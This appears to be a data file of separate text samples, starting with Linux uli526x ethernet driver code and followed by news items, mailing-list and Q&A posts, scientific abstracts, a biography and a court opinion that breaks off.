dev->dev_addr;\n\t*suptr++ = addrptr[0] << FLT_SHIFT;\n\t*suptr++ = addrptr[1] << FLT_SHIFT;\n\t*suptr++ = addrptr[2] << FLT_SHIFT;\n\n\t/* broadcast address */\n\t*suptr++ = 0xffff << FLT_SHIFT;\n\t*suptr++ = 0xffff << FLT_SHIFT;\n\t*suptr++ = 0xffff << FLT_SHIFT;\n\n\t/* fit the multicast address */\n\tnetdev_for_each_mc_addr(ha, dev) {\n\t\taddrptr = (u16 *) ha->addr;\n\t\t*suptr++ = addrptr[0] << FLT_SHIFT;\n\t\t*suptr++ = addrptr[1] << FLT_SHIFT;\n\t\t*suptr++ = addrptr[2] << FLT_SHIFT;\n\t}\n\n\tfor (i = netdev_mc_count(dev); i < 14; i++) {\n\t\t*suptr++ = 0xffff << FLT_SHIFT;\n\t\t*suptr++ = 0xffff << FLT_SHIFT;\n\t\t*suptr++ = 0xffff << FLT_SHIFT;\n\t}\n\n\t/* prepare the setup frame */\n\tdb->tx_insert_ptr = txptr->next_tx_desc;\n\ttxptr->tdes1 = cpu_to_le32(0x890000c0);\n\n\t/* Resource Check and Send the setup packet */\n\tif (db->tx_packet_cnt < TX_DESC_CNT) {\n\t\t/* Resource Empty */\n\t\tdb->tx_packet_cnt++;\n\t\ttxptr->tdes0 = cpu_to_le32(0x80000000);\n\t\tupdate_cr6(db->cr6_data | 0x2000, ioaddr);\n\t\tuw32(DCR1, 0x1);\t/* Issue Tx polling */\n\t\tupdate_cr6(db->cr6_data, ioaddr);\n\t\tnetif_trans_update(dev);\n\t} else\n\t\tnetdev_err(dev, \"No Tx resource - Send_filter_frame!\\n\");\n}\n\n\n/*\n *\tAllocate rx buffer,\n *\tAs possible as allocate maxiumn Rx buffer\n */\n\nstatic void allocate_rx_buffer(struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tstruct rx_desc *rxptr;\n\tstruct sk_buff *skb;\n\n\trxptr = db->rx_insert_ptr;\n\n\twhile(db->rx_avail_cnt < RX_DESC_CNT) {\n\t\tskb = netdev_alloc_skb(dev, RX_ALLOC_SIZE);\n\t\tif (skb == NULL)\n\t\t\tbreak;\n\t\trxptr->rx_skb_ptr = skb; /* FIXME (?) */", "\n\t\trxptr->rdes2 = cpu_to_le32(pci_map_single(db->pdev,\n\t\t\t\t\t\t\t skb_tail_pointer(skb),\n\t\t\t\t\t\t\t RX_ALLOC_SIZE,\n\t\t\t\t\t\t\t PCI_DMA_FROMDEVICE));\n\t\twmb();\n\t\trxptr->rdes0 = cpu_to_le32(0x80000000);\n\t\trxptr = rxptr->next_rx_desc;\n\t\tdb->rx_avail_cnt++;\n\t}\n\n\tdb->rx_insert_ptr = rxptr;\n}\n\n\n/*\n *\tRead one word data from the serial ROM\n */\n\nstatic u16 read_srom_word(struct uli526x_board_info *db, int offset)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tu16 srom_data = 0;\n\tint i;\n\n\tuw32(DCR9, CR9_SROM_READ);\n\tuw32(DCR9, CR9_SROM_READ | CR9_SRCS);\n\n\t/* Send the Read Command 110b */\n\tsrom_clk_write(db, SROM_DATA_1);\n\tsrom_clk_write(db, SROM_DATA_1);\n\tsrom_clk_write(db, SROM_DATA_0);\n\n\t/* Send the offset */\n\tfor (i = 5; i >= 0; i--) {\n\t\tsrom_data = (offset & (1 << i)) ? ", "SROM_DATA_1 : SROM_DATA_0;\n\t\tsrom_clk_write(db, srom_data);\n\t}\n\n\tuw32(DCR9, CR9_SROM_READ | CR9_SRCS);\n\n\tfor (i = 16; i > 0; i--) {\n\t\tuw32(DCR9, CR9_SROM_READ | CR9_SRCS | CR9_SRCLK);\n\t\tudelay(5);\n\t\tsrom_data = (srom_data << 1) |\n\t\t\t ((ur32(DCR9) & CR9_CRDOUT) ? ", "1 : 0);\n\t\tuw32(DCR9, CR9_SROM_READ | CR9_SRCS);\n\t\tudelay(5);\n\t}\n\n\tuw32(DCR9, CR9_SROM_READ);\n\treturn srom_data;\n}\n\n\n/*\n *\tAuto sense the media mode\n */\n\nstatic u8 uli526x_sense_speed(struct uli526x_board_info * db)\n{\n\tstruct uli_phy_ops *phy = &db->phy;\n\tu8 ErrFlag = 0;\n\tu16 phy_mode;\n\n\tphy_mode = phy->read(db, db->phy_addr, 1);\n\tphy_mode = phy->read(db, db->phy_addr, 1);\n\n\tif ( (phy_mode & 0x24) == 0x24 ) {\n\n\t\tphy_mode = ((phy->read(db, db->phy_addr, 5) & 0x01e0)<<7);\n\t\tif(phy_mode&0x8000)\n\t\t\tphy_mode = 0x8000;\n\t\telse if(phy_mode&0x4000)\n\t\t\tphy_mode = 0x4000;\n\t\telse if(phy_mode&0x2000)\n\t\t\tphy_mode = 0x2000;\n\t\telse\n\t\t\tphy_mode = 0x1000;\n\n\t\tswitch (phy_mode) {\n\t\tcase 0x1000: db->op_mode = ULI526X_10MHF; break;\n\t\tcase 0x2000: db->op_mode = ULI526X_10MFD; break;\n\t\tcase 0x4000: db->op_mode = ULI526X_100MHF; break;\n\t\tcase 0x8000: db->op_mode = ULI526X_100MFD; break;\n\t\tdefault: db->op_mode = ULI526X_10MHF; ErrFlag = 1; break;\n\t\t}\n\t} else {\n\t\tdb->op_mode = ULI526X_10MHF;\n\t\tULI526X_DBUG(0, \"Link Failed :\", phy_mode);\n\t\tErrFlag = 1;\n\t}\n\n\treturn ErrFlag;\n}\n\n\n/*\n *\tSet 10/100 phyxcer capability\n *\tAUTO mode : phyxcer register4 is NIC capability\n *\tForce mode: phyxcer register4 is the force media\n */\n\nstatic void uli526x_set_phyxcer(struct uli526x_board_info *db)\n{\n\tstruct uli_phy_ops *phy = &db->phy;\n\tu16 phy_reg;\n\n\t/* Phyxcer capability setting */\n\tphy_reg = phy->read(db, db->phy_addr, 4) & ~0x01e0;\n\n\tif (db->media_mode & ULI526X_AUTO) {\n\t\t/* AUTO Mode */\n\t\tphy_reg |= db->PHY_reg4;\n\t} else {\n\t\t/* Force Mode */\n\t\tswitch(db->media_mode) {\n\t\tcase ULI526X_10MHF: phy_reg |= 0x20; break;\n\t\tcase ULI526X_10MFD: phy_reg |= 0x40; break;\n\t\tcase ULI526X_100MHF: phy_reg |= 0x80; break;\n\t\tcase ULI526X_100MFD: phy_reg |= 0x100; break;\n\t\t}\n\n\t}\n\n \t/* Write new capability to Phyxcer Reg4 */\n\tif ( !(", "phy_reg & 0x01e0)) {\n\t\tphy_reg|=db->PHY_reg4;\n\t\tdb->media_mode|=ULI526X_AUTO;\n\t}\n\tphy->write(db, db->phy_addr, 4, phy_reg);\n\n \t/* Restart Auto-Negotiation */\n\tphy->write(db, db->phy_addr, 0, 0x1200);\n\tudelay(50);\n}\n\n\n/*\n *\tProcess op-mode\n \tAUTO mode : PHY controller in Auto-negotiation Mode\n *\tForce mode: PHY controller in force mode with HUB\n *\t\t\tN-way force capability with SWITCH\n */\n\nstatic void uli526x_process_mode(struct uli526x_board_info *db)\n{\n\tstruct uli_phy_ops *phy = &db->phy;\n\tu16 phy_reg;\n\n\t/* Full Duplex Mode Check */\n\tif (db->op_mode & 0x4)\n\t\tdb->cr6_data |= CR6_FDM;\t/* Set Full Duplex Bit */\n\telse\n\t\tdb->cr6_data &= ~CR6_FDM;\t/* Clear Full Duplex Bit */\n\n\tupdate_cr6(db->cr6_data, db->ioaddr);\n\n\t/* 10/100M phyxcer force mode need */\n\tif (!(", "db->media_mode & 0x8)) {\n\t\t/* Forece Mode */\n\t\tphy_reg = phy->read(db, db->phy_addr, 6);\n\t\tif (!(", "phy_reg & 0x1)) {\n\t\t\t/* parter without N-Way capability */\n\t\t\tphy_reg = 0x0;\n\t\t\tswitch(db->op_mode) {\n\t\t\tcase ULI526X_10MHF: phy_reg = 0x0; break;\n\t\t\tcase ULI526X_10MFD: phy_reg = 0x100; break;\n\t\t\tcase ULI526X_100MHF: phy_reg = 0x2000; break;\n\t\t\tcase ULI526X_100MFD: phy_reg = 0x2100; break;\n\t\t\t}\n\t\t\tphy->write(db, db->phy_addr, 0, phy_reg);\n\t\t}\n\t}\n}\n\n\n/* M5261/M5263 Chip */\nstatic void phy_writeby_cr9(struct uli526x_board_info *db, u8 phy_addr,\n\t\t\t u8 offset, u16 phy_data)\n{\n\tu16 i;\n\n\t/* Send 33 synchronization clock to Phy controller */\n\tfor (i = 0; i < 35; i++)\n\t\tphy_write_1bit(db, PHY_DATA_1);\n\n\t/* Send start command(01) to Phy */\n\tphy_write_1bit(db, PHY_DATA_0);\n\tphy_write_1bit(db, PHY_DATA_1);\n\n\t/* Send write command(01) to Phy */\n\tphy_write_1bit(db, PHY_DATA_0);\n\tphy_write_1bit(db, PHY_DATA_1);\n\n\t/* Send Phy address */\n\tfor (i = 0x10; i > 0; i = i >> 1)\n\t\tphy_write_1bit(db, phy_addr & i ? ", "PHY_DATA_1 : PHY_DATA_0);\n\n\t/* Send register address */\n\tfor (i = 0x10; i > 0; i = i >> 1)\n\t\tphy_write_1bit(db, offset & i ? ", "PHY_DATA_1 : PHY_DATA_0);\n\n\t/* written trasnition */\n\tphy_write_1bit(db, PHY_DATA_1);\n\tphy_write_1bit(db, PHY_DATA_0);\n\n\t/* Write a word data to PHY controller */\n\tfor (i = 0x8000; i > 0; i >>= 1)\n\t\tphy_write_1bit(db, phy_data & i ? ", "PHY_DATA_1 : PHY_DATA_0);\n}\n\nstatic u16 phy_readby_cr9(struct uli526x_board_info *db, u8 phy_addr, u8 offset)\n{\n\tu16 phy_data;\n\tint i;\n\n\t/* Send 33 synchronization clock to Phy controller */\n\tfor (i = 0; i < 35; i++)\n\t\tphy_write_1bit(db, PHY_DATA_1);\n\n\t/* Send start command(01) to Phy */\n\tphy_write_1bit(db, PHY_DATA_0);\n\tphy_write_1bit(db, PHY_DATA_1);\n\n\t/* Send read command(10) to Phy */\n\tphy_write_1bit(db, PHY_DATA_1);\n\tphy_write_1bit(db, PHY_DATA_0);\n\n\t/* Send Phy address */\n\tfor (i = 0x10; i > 0; i = i >> 1)\n\t\tphy_write_1bit(db, phy_addr & i ? ", "PHY_DATA_1 : PHY_DATA_0);\n\n\t/* Send register address */\n\tfor (i = 0x10; i > 0; i = i >> 1)\n\t\tphy_write_1bit(db, offset & i ? ", "PHY_DATA_1 : PHY_DATA_0);\n\n\t/* Skip transition state */\n\tphy_read_1bit(db);\n\n\t/* read 16bit data */\n\tfor (phy_data = 0, i = 0; i < 16; i++) {\n\t\tphy_data <<= 1;\n\t\tphy_data |= phy_read_1bit(db);\n\t}\n\n\treturn phy_data;\n}\n\nstatic u16 phy_readby_cr10(struct uli526x_board_info *db, u8 phy_addr,\n\t\t\t u8 offset)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tu32 cr10_value = phy_addr;\n\n\tcr10_value = (cr10_value << 5) + offset;\n\tcr10_value = (cr10_value << 16) + 0x08000000;\n\tuw32(DCR10, cr10_value);\n\tudelay(1);\n\twhile (1) {\n\t\tcr10_value = ur32(DCR10);\n\t\tif (cr10_value & 0x10000000)\n\t\t\tbreak;\n\t}\n\treturn cr10_value & 0x0ffff;\n}\n\nstatic void phy_writeby_cr10(struct uli526x_board_info *db, u8 phy_addr,\n\t\t\t u8 offset, u16 phy_data)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tu32 cr10_value = phy_addr;\n\n\tcr10_value = (cr10_value << 5) + offset;\n\tcr10_value = (cr10_value << 16) + 0x04000000 + phy_data;\n\tuw32(DCR10, cr10_value);\n\tudelay(1);\n}\n/*\n *\tWrite one bit data to Phy Controller\n */\n\nstatic void phy_write_1bit(struct uli526x_board_info *db, u32 data)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\n\tuw32(DCR9, data);\t\t/* MII Clock Low */\n\tudelay(1);\n\tuw32(DCR9, data | MDCLKH);\t/* MII Clock High */\n\tudelay(1);\n\tuw32(DCR9, data);\t\t/* MII Clock Low */\n\tudelay(1);\n}\n\n\n/*\n *\tRead one bit phy data from PHY controller\n */\n\nstatic u16 phy_read_1bit(struct uli526x_board_info *db)\n{\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tu16 phy_data;\n\n\tuw32(DCR9, 0x50000);\n\tudelay(1);\n\tphy_data = (ur32(DCR9) >> 19) & 0x1;\n\tuw32(DCR9, 0x40000);\n\tudelay(1);\n\n\treturn phy_data;\n}\n\n\nstatic const struct pci_device_id uli526x_pci_tbl[] = {\n\t{ 0x10B9, 0x5261, PCI_ANY_ID, PCI_ANY_ID, 0, 0, PCI_ULI5261_ID },\n\t{ 0x10B9, 0x5263, PCI_ANY_ID, PCI_ANY_ID, 0, 0, PCI_ULI5263_ID },\n\t{ 0, }\n};\nMODULE_DEVICE_TABLE(pci, uli526x_pci_tbl);\n\n\nstatic struct pci_driver uli526x_driver = {\n\t.name\t\t= \"uli526x\",\n\t.id_table\t= uli526x_pci_tbl,\n\t.probe\t\t= uli526x_init_one,\n\t.remove\t\t= uli526x_remove_one,\n\t.suspend\t= uli526x_suspend,\n\t.resume\t\t= uli526x_resume,\n};\n\nMODULE_AUTHOR(\"Peer Chen, peer.chen@uli.com.tw\");\nMODULE_DESCRIPTION(\"ULi M5261/M5263 fast ethernet driver\");\nMODULE_LICENSE(\"GPL\");\n\nmodule_param(debug, int, 0644);\nmodule_param(mode, int, 0);\nmodule_param(cr6set, int, 0);\nMODULE_PARM_DESC(debug, \"ULi M5261/M5263 enable debugging (0-1)\");\nMODULE_PARM_DESC(mode, \"ULi M5261/M5263: Bit 0: 10/100Mbps, bit 2: duplex, bit 8: HomePNA\");\n\n/*\tDescription:\n *\twhen user used insmod to add module, system invoked init_module()\n *\tto register the services.", "\n */\n\nstatic int __init uli526x_init_module(void)\n{\n\n\tULI526X_DBUG(0, \"init_module() \", debug);\n\n\tif (debug)\n\t\tuli526x_debug = debug;\t/* set debug flag */\n\tif (cr6set)\n\t\tuli526x_cr6_user_set = cr6set;\n\n\tswitch (mode) {\n\tcase ULI526X_10MHF:\n\tcase ULI526X_100MHF:\n\tcase ULI526X_10MFD:\n\tcase ULI526X_100MFD:\n\t\tuli526x_media_mode = mode;\n\t\tbreak;\n\tdefault:\n\t\tuli526x_media_mode = ULI526X_AUTO;\n\t\tbreak;\n\t}\n\n\treturn pci_register_driver(&uli526x_driver);\n}\n\n\n/*\n *\tDescription:\n *\twhen user used rmmod to delete module, system invoked clean_module()\n *\tto un-register all registered services.", "\n */\n\nstatic void __exit uli526x_cleanup_module(void)\n{\n\tULI526X_DBUG(0, \"uli526x_cleanup_module() \", debug);\n\tpci_unregister_driver(&uli526x_driver);\n}\n\nmodule_init(uli526x_init_module);\nmodule_exit(uli526x_cleanup_module);\n" ]
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[ "The New York Islanders are close to upgrading their blue-line, and the Chicago Blackhawks are about to pay bail and get out of salary cap prison. ", "Sounds like a win-win.", "\n\nFrom Arthur Staple of Newsday:\n\n#Isles are very close to acquiring CHI D Nick Leddy, according to sources. ", "Have not heard what would go back to CHI yet. — ", "Arthur Staple (@StapeNewsday) October 4, 2014\n\nUPDATE: The Islanders, changing gears quickly, acquired Johnny Boychuk from the Boston Bruins in exchange for three mid-round picks on Saturday." ]
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[ "Hi,\nBack again with a new patch\nHow to generate HTML directives using ehtml (I wanted to send DOCTYPE\nusing ehtml, but others will work equally well).", "\ne.g. {ehtml, {'!", "DOCTYPE', [\"html\", \"PUBLIC\", \"\\\"...\\\"\", \"\\\"...\\\"\"]}\nwill produce the proper output with the attached patch:\n<!", "DOCTYPE, html PUBLIC \"...\" \"...\">\nOne possible problem: text will not be properly htmlized\n(BTW I used the BIF list, instead of is_list, just to be consistent\nwith the rest of the code).", "\nOn to my next problem, how to handle entities correctly. ", "Currently\nthey are treated as normal text and as such get (properly) htmlized,\nbut that's not what I think should happen.", "\nGuess that htmlize needs to be adapted.", "\nBTW why doesn't ehtml_expand use htmlize(list)?", "\n/Rob\n*** /space/home/rosc/src/yaws/src/yaws_api.erl Wed Dec 17 21:26:45 2003\n--- yaws_api.erl Wed Jan 28 16:53:39 2004\n***************\n*** 1214,1219 ****\n--- 1214,1221 ----\nehtml_attrs([]) -> [];\nehtml_attrs([Attribute|Tail]) when atom(Attribute) ->\n[[$ |atom_to_list(Attribute)]|ehtml_attrs(Tail)];\n+ ehtml_attrs([Attribute|Tail]) when list(Attribute) ->\n+ [\" \", Attribute|ehtml_attrs(Tail)];\nehtml_attrs([{Name, Value} | Tail]) ->\nValueString = if atom(Value) -> [$\",atom_to_list(Value),$\"];\nlist(Value) -> [$\",Value,$\"];\nThis e-mail and any attachment is for authorised use by the intended recipient(s) only. ", "It may contain proprietary material, confidential information and/or be subject to legal privilege. ", "It should not be copied, disclosed to, retained or used by, any other party. ", "If you are not an intended recipient then please promptly delete this e-mail and any attachment and all copies and inform the sender. ", "Thank you.", "\n\nI wrote:\n> On Sun, Jan 18, 2004 at 08:52:31PM +0100, Claes Wikstrom wrote:\n>> Only thing was that (using gentoo) the cgi capable php executable\n>> was called pgp-cgi (as opposed to the hardcoded \"php\") This either\n>> needs to be configurable,\n>\n> It definitely should be. [...]", "\n>\n> I could try to make this configurable some time next week.", "\n[x] done\nBTW, cvs access is slowww...\nGreetings,\nCarsten\n\nOn Sun, Jan 18, 2004 at 08:52:31PM +0100, Claes Wikstrom wrote:\n> I just wanted to write and report and that I'm successfully running\n> a php package called occ (online chess club) using Yaws cgi/php\n> functionality. ", "Works like a charm.", "\nPleased to read this.", "\n> Only thing was that (using gentoo) the cgi capable php executable\n> was called pgp-cgi (as opposed to the hardcoded \"php\") This either\n> needs to be configurable,\nIt definitely should be. ", "I have to admit that I am using a patched\nversion with a different hardcoded path... Alternatively I could of\ncourse have set PATH in the environment of yaws.", "\nI could try to make this configurable some time next week.", "\nGreetings,\nCarsten\n--=20\nCarsten Schultz (2:38, 33:47), FB Mathematik, FU Berlin\nhttp://carsten.codimi.de/\nPGP/GPG key on the pgp.net key servers,=20\nfingerprint on my home page.", "\n\nI just wanted to write and report and that I'm successfully\nrunning a php package called occ (online chess club) using Yaws\ncgi/php functionality. ", "Works like a charm.", "\nOnly thing was that (using gentoo) the cgi capable php executable\nwas called pgp-cgi (as opposed to the hardcoded \"php\")\nThis either needs to be configurable, changed or there is some php magic\nthat I don't get yet ......\n/klacke\n--\nClaes Wikstrom -- Caps lock is nowhere and\nhttp://www.hyber.org -- everything is under control\n\nSorry Johan, I got caught up and didn't reply to this (I think :-)\nJohan Bevemyr wrote:\n>>I'm thinking about putting my photos online using yaws (rather than\n>>album http://MarginalHacks.com/Hacks/album/\n>><http://freshmeat.net/redir/album/181/url_homepage/album&gt;). ", "I've noticed\n>>a few additions to the wiki to support thumbnails and slideshows,\n>>although it doesn't appear to all be there (specifically slideShow.yaws\n>>is missing).", "\n>>\n>>\n>\n>Sorry, missed to add that file and some gifs too. ", "I've now\n>added them to sourceforge. ", "You will have to cvs update the\n>application/wiki/src and application/wiki/wiki directories.", "\n>\n>\n>\nThanks!", "\n>Sure, I've set up a demo site at show.bevemyr.com. ", "The way\n>it works is that you add a bunch of files (gifs or jpegs) to\n>a page, and then add the text slideshow:<linkname> to the text.", "\n>When you hit the <linkname> you will get to see the first picture\n>(reduced to max 400x400 pixels) and the files description text\n>below the picture. ", "You will also get a bunch of icons at the top\n>back, forward, thumbnail index and camera (the icons are pretty\n>ugly so feel free to contribute with prettier ones :-).", "\n>\n>If you click on the picture you will get it in its natrual size\n>in a separate window.", "\n>\n>All thumbnails and 400x400 pictures are converted using 'convert'\n>and cached in the .files directory.", "\n>\n>A very useful command when importing large number of files to a\n>page is importFiles <path to wob file>. ", "Just copy the files into\n>the <page>.files directory and run the importFiles script.", "\n>\n>\n>\nNice photos. ", "I like the approach, although I'm not sure if I'm going to\nuse it, I'm either going to use Gallery (as Carsten suggested) or\nreimplement Gallery in Erlang (cos its fun). ", "If I reimplement it I think\nI will support their client protocol so the Gallery front ends work.", "\nThanks a lot,\nBruce" ]
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[ "C’è chi urla: «Gli zingari non li vogliamo». ", "Chi si domanda: «Ma i posti letto non sarebbe meglio darli ai terremotati invece che ai rom?». ", "E infine chi, senza vergogna, minaccia: «Daremo fuoco a tutto». ", "È una protesta rabbiosa quella dei residenti di Torre Maura, periferia est della Capitale, che ieri pomeriggio si sono riversati davanti al centro di accoglienza di via dei Codirossoni, per protestare contro il trasferimento di 70 persone, tra rom e sinti, considerate in stato di «fragilità sociale».", "\n\nAlla base del dislocamento deciso dal Campidoglio la vittoria, da parte dello stabile di Torre Maura, del bando europeo per l’accoglienza. ", "L’edificio in questione sarebbe infatti risultato più funzionale rispetto a quello di via Toraldo, nella vicina Torre Angela. ", "Una struttura quest’ultima abitata per tre anni dalle famiglie rom: dal gennaio 2014 fino a ieri pomeriggio. ", "Sugli scontri di ieri pomeriggio la procura della Capitale ha aperto un fascicolo di indagine che ipotizza i reati di danneggiamento e minacce aggravate dall’odio razziale. ", "Al momento l’aggiunto Francesco Caporale attende l’informativa dai poliziotti della Squadra Mobile.", "\n\nIn piazza anche CasaPound\n\nTra i manifestanti, circa 250 persone, anche diversi appartenenti di CasaPound, i fascisti del terzo millennio. ", "Sul posto è intervenuta la polizia di stato in tenuta antisommossa. «", "Cori e insulti ce ne sono stati, ma non si è mai andati oltre. ", "Non c’è stato contatto fisico né –con noi né con i rom», spiegano a La Stampa fonti delle forze dell’ordine. ", "Le proteste però sono state molto accese. ", "Durante la rivolta sono stati, infatti, incendiati tre cassonetti dei rifiuti e bloccata la consegna dei pasti all’interno della struttura. ", "Proteste che sconfinano nella violenza, ma anche «del tutto prive di fondamento, in quanto messe in atto contro famiglie che hanno delle gravi fragilità sociali». «", "Sono integrati nel quartiere da anni e l’individuazione di quella struttura è utile garantire la continuità dei cicli scolastici per i più piccoli», spiega la portavoce del Forum del Terzo settore del Lazio, Francesca Danese che parla di veri e propri «atti di intolleranza figli del clima di odio che certa cattiva politica sta alimentando nel Paese».", "\n\nMaria Vittoria Molinari, dell’Unione sindacale di base (Asia-Usb) sottolinea le responsabilità del Comune di Roma: «La vicenda è stata gestita male in quanto il municipio non è stato informato in tempo del trasferimento e non ha potuto preparare i cittadini che sono stanchi a questo punto delle decisioni dall’alto». ", "Ancora più critica Angela Barone, presidente del comitato inquilini Isveur Torre Maura, che afferma: «I residenti non sopportano che la zona venga trattata come la discarica di tutti i problemi dei cittadini romani».", "\n\nBY NC ND ALCUNI DIRITTI RISERVATI" ]
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[ "Airbus planning to develop Flying Car prototype before the end of this year\n\nThere are many people, who have the fantasies to see the driving cars in the air. ", "This fantasy will no longer be confined to your to your imagination as Airbus is planning to develop flying car prototype at the end of this year.", "\n\nTraffic jams making us late to the work is not a new problem. ", "The gridlock because of the myriads of vehicles in the road is also inviting an environmental (sound and air) pollution. ", "Moreover, the investment for making roads and bridges is devouring the budget of the nation and hindering other developments. ", "Keeping all the problems in mind, Airbus is going to develop a flying car as the solution to all those problems.", "\n\n“One hundred years ago, urban transport went underground, now we have the technological wherewithal to go above ground,” Airbus CEO Tom Enders unveiled his enthusiasm to the DLD digital tech conference in Munich.", "\n\nFor the sake of shaping the self-piloted flying car plan into reality, Airbus formed a division called Urban Air Mobility last year. ", "The division primarily focuses on discovering concepts about the transportation through the air media. ", "The Airbus has conceived the vehicle to be helicopter-styled capable of carrying multiple riders.", "\n\nHoping to be the pioneer in the flying vehicle business, Jorg Muller, from Airbus’ corporate development department said, “This market will develop quickly once we are able to deploy the first vehicles in megacities and demonstrate the benefits of quiet, emission-free air transport at competitive prices.”", "\n\nCEO Enders implied that Airbus, being the world’s largest commercial helicopter maker would always be focused on inviting technology to its traction system. ", "Enders also showed his interests to invite autonomous driving and artificial intelligence in order to usher the humankind to the epoch of flying cars. ", "According to the Enders, the “sky taxi” would be 100 percent electric and he further implied to bring the vehicle until 2021 if the prototype gets ready at the end of this year." ]
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[ "Q:\n\njQueryUI Draggable clone of bigger size than original item has same hitbox as original item\n\nDuring drag, draggable clone is changing it's dimensions. ", "But clone hitbox stays the same as element from which it's being dragged, and appears to position itself somewhere vertically centered inside clone element.", "\nThe question is - is it possible to fix this in order to stretch hitbox to clone dimensions? ", "Because I'm having an issues by not being able to normally drop those elements inside certain droppable containers (for example, drag item holding it with item's top-left corner).", "\nAnd here is an example, where you can drag squares from yellow box(draggables) into pink box(droppable) and see if clone element is over or out of droppable box by \".log_box\" element http://codepen.io/anon/pen/BjyzI.\nHere is JS code itself\n//clone is having class 'bigger' added, to multiply it's size\n$('.content_list li').draggable({\n helper: function(event, ui) {\n return \"<div class='widget content bigger'>I'm flying!!! ", "And I'm bigger than my parent!' :)", "</div>\";\n },\n revert: 'invalid'\n});\n\n//simple caching of a .log_box list query\nvar $log_box = $('.log_box');\n\n$('.droppable_box').droppable({\n activeClass: 'drop_here',\n drop: function(event, ui) {\n $log_box.append('<li>Drop hit.</li>');\n },\n over: function(event, ui) {\n $log_box.append('<li>Over.</li>');\n },\n out: function(event, ui) {\n $log_box.append('<li>Out.</li>'); \n }\n});\n\nA:\n\nI don't really see an issue with the hitbox. ", "It's exactly the default behaviour for the cloned helper's size. ", "Perhaps you find it strange since the target droppable's size is much smaller than the draggable? ", "As the documentation for the tolerance option says:\n\n\"intersect\": Draggable overlaps the droppable at least 50% in both directions.", "\n\n(this overlap is somewhat forced when the draggable is bigger than the droppable)\n\nMaybe you could use the tolerance option to improve the visual usability:\n$('.droppable_box').droppable({\n tolerance: \"touch\"\n});\n\nHere's a fork on your pen: http://codepen.io/anon/pen/bywAf\n\n" ]
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[ "Echocardiographic evaluation of the right ventricle: a 2014 perspective.", "\nThe ability to properly evaluate the right ventricular size and function can have important consequences for clinical management and prognosis. ", "Echocardiography is and will remain the leading method of right ventricle (RV) assessment due to its ease of use and wealth of diagnostic information provided. ", "Understanding the various strengths and limitations of the diverse echocardiographic methods of RV assessment can allow a systematic approach to resolve situations where one's quantitative parameters are not necessarily concordant. ", "Quantification of RV volume can be done by two-dimensional (2D) and three-dimensional (3D) echocardiography. ", "Measurements of RV systolic function include fractional area change (FAC), right-sided index of myocardial performance (RIMP), RV ejection fraction (RVEF), tricuspid annular plane excursion by M-Mode (TAPSE), tricuspid annular systolic longitudinal velocity by tissue Doppler (S'), and regional strain and strain rate. ", "RVEF can also be assessed volumetrically by 3D echocardiography. ", "This article will review the current methods used in contemporary echocardiography laboratories, with an emphasis on a guideline-based approach as well as emerging techniques." ]
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[ "Q:\n\nhow to remove \"TERM environment variable not set\"\n\nI am having a script runonce.sh who calls another script setup.sh through cron. ", "We consider this case as ideal case where \"TERM environment variable not set.\" ", "is seen in output of runonce.sh script. ", "\nNow I am facing a problem that another third simple script - upgradeAndTest.sh when calls setup.sh, that time also \"TERM environment variable not set.\" ", "is seen in output of upgradeAndTest.sh script. ", "Why is so..?", "\nAlso, if I redirect stderr of setup.sh to stdout in calling script then also \"TERM environment variable not set.\" ", "displays on console. ", "\nCan any one help me to remove this line from stdout of calling script..?", "\n\nA:\n\nRunning a program that demands a terminal via cron can lead to problems; it won't have a terminal when it is run by cron.", "\nIn case of doubt, though, ensure that the variable is set in the script, by adding a line:\nexport TERM=${TERM:-dumb}\n\nIf the environment variable TERM is already set, this is a no-op. ", " If it is not, it sets the terminal to a standard one with minimal capabilities — this satisfies the program that complains about TERM not being set.", "\n\n" ]
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[ "Kåre Simensen\n\nKåre Simensen (born 30 August 1955) is a Norwegian politician for the Labour Party.", "\n\nHe was born in Alta and finished secondary school here in 1978. ", "Between lower secondary school and upper secondary school he worked in the shale industry. ", "He then worked with IT. ", "He took education as an IT engineer at Gjøvik Engineer's College from 1979 to 1982 and has a degree in economics from Finnmark University College in 1990.", "\n\nHe was a member of Alta municipal council from 1995 to 2007, serving the last term as deputy mayor. ", "From 2007 to 2009 he was a member of the executive in Finnmark county council, and was also a board member of the Northern Norway Regional Health Authority. ", "He was elected to the Parliament of Norway in 2009 as the party's second candidate from Finnmark.", "\n\nReferences\n\nCategory:1955 births\nCategory:Living people\nCategory:People from Alta, Norway\nCategory:Members of the Storting\nCategory:Finnmark politicians\nCategory:Labour Party (Norway) politicians\nCategory:21st-century Norwegian politicians" ]
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[ "Calcitonin variations in male and female trout, Salmo gairdneri, during the annual cycle.", "\nCalcitonin (CT) levels in the ultimobranchial body and in plasma were radioimmunoassayed in rainbow trout, Salmo gairdneri, as a function of the annual cycle. ", "In male and female, there was an important increase in the CT levels in the ultimobranchial body and in plasma. ", "These variations in CT levels in both male and female suggest that sexual maturity influences the synthesis and the secretion of calcitonin in fishes. ", "A positive correlation was observed between plasma and ultimobranchial CT levels and the gonadosomatic index in both sexes, suggesting that CT has a role in the processes involved in gonadal development." ]
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[ "630 F.2d 745\nFaustin and Georgia MONTOYA, Plaintiffs-Appellees,v.POSTAL CREDIT UNION, Defendant-Appellant.", "\nNo. ", "79-1198.", "\nUnited States Court of Appeals,Tenth Circuit.", "\nArgued May 6, 1980.Decided Aug. 18, 1980.Rehearing Denied Oct. 17, 1980.", "\n\nHerbert A. Delap of Shafroth & Toll, P.C., Denver, Colo., for defendant-appellant.", "\nPeter H. Klages of Legal Aid Soc. ", "of Albuquerque, Inc., Albuquerque, N.M. (Elena Spielman and Armando Torres, Albuquerque, N.M., with him on the brief), for plaintiffs-appellees.", "\nBefore SETH, Chief Judge, BREITENSTEIN and DOYLE, Circuit Judges.", "\nSETH, Chief Judge.", "\n\n\n1\nThe plaintiffs who are husband and wife brought this suit under the Consumer Credit Protection Act, 15 U.S.C. § 1601, et seq., ", "against the Postal Credit Union. ", " The complaint alleges that certain required disclosures were not made as to New Mexico law relating to security on after-acquired property.", "\n\n\n2\nThe record shows that the plaintiffs had secured a loan from the Postal Credit Union some five or six years before this suit. ", " The loan was secured by a deed of trust on plaintiffs' house. ", " This loan was changed several times, but by reason 